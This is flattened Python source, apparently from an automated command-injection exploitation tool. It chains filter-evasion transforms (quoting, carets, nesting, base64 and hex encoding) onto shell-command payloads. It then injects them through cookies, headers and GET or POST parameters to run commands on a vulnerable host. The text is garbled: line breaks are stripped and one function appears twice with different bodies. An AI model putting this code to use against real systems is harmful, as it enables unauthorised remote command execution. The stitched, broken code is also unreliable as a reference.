def perform_payload_modification(payload): for encode_type in list(set(settings.MULTI_ENCODED_PAYLOAD[::-1])): # Add single quotes. if encode_type == 'singlequotes': from src.core.tamper import singlequotes payload = singlequotes.transform(payload) # Add caret symbol. elif encode_type == 'backslashes': from src.core.tamper import backslashes payload = backslashes.transform(payload) # Add caret symbol. elif encode_type == 'caret': from src.core.tamper import caret payload = caret.transform(payload) # Transfomation to nested command elif encode_type == 'nested': from src.core.tamper import nested payload = nested.transform(payload) for encode_type in list(set(settings.MULTI_ENCODED_PAYLOAD[::-1])): # Encode payload to hex format. if encode_type == 'base64encode': from src.core.tamper import base64encode payload = base64encode.encode(payload) # Encode payload to hex format. if encode_type == 'hexencode': from src.core.tamper import hexencode payload = hexencode.encode(payload) return payload
def perform_payload_encoding(payload): for encode_type in settings.MULTI_ENCODED_PAYLOAD[::-1]: # Encode payload to hex format. if encode_type == 'base64encode': from src.core.tamper import base64encode payload = base64encode.encode(payload) # Encode payload to hex format. if encode_type == 'hexencode': from src.core.tamper import hexencode payload = hexencode.encode(payload) return payload
def perform_payload_modification(payload): for encode_type in settings.MULTI_ENCODED_PAYLOAD[::-1]: # Add single quotes. if encode_type == 'singlequotes': from src.core.tamper import singlequotes payload = singlequotes.transform(payload) for encode_type in settings.MULTI_ENCODED_PAYLOAD[::-1]: # Encode payload to hex format. if encode_type == 'base64encode': from src.core.tamper import base64encode payload = base64encode.encode(payload) # Encode payload to hex format. if encode_type == 'hexencode': from src.core.tamper import hexencode payload = hexencode.encode(payload) return payload
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = fb_payloads.cmd_execution_alter_shell( separator, cmd, OUTPUT_TEXTFILE) else: payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Encode payload to base64 format. if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Encode payload to hex format. elif settings.TAMPER_SCRIPTS['hexencode']: from src.core.tamper import hexencode payload = hexencode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") if settings.COMMENT in payload_msg: payload = payload.split(settings.COMMENT)[0].strip() payload_msg = payload_msg.split(settings.COMMENT)[0].strip() info_msg = "Executing the '" + cmd.split( settings.COMMENT)[0].strip() + "' command... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() output_payload = "\n" + settings.print_payload(payload) if settings.VERBOSITY_LEVEL >= 1: output_payload = output_payload + "\n" sys.stdout.write(output_payload) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) payload = payload.replace(" ", "%20") target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) # Define the POST data if settings.IS_JSON: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) try: data = json.loads(data, strict=False) except: pass request = urllib2.Request(url, json.dumps(data)) else: if settings.IS_XML: data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) else: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response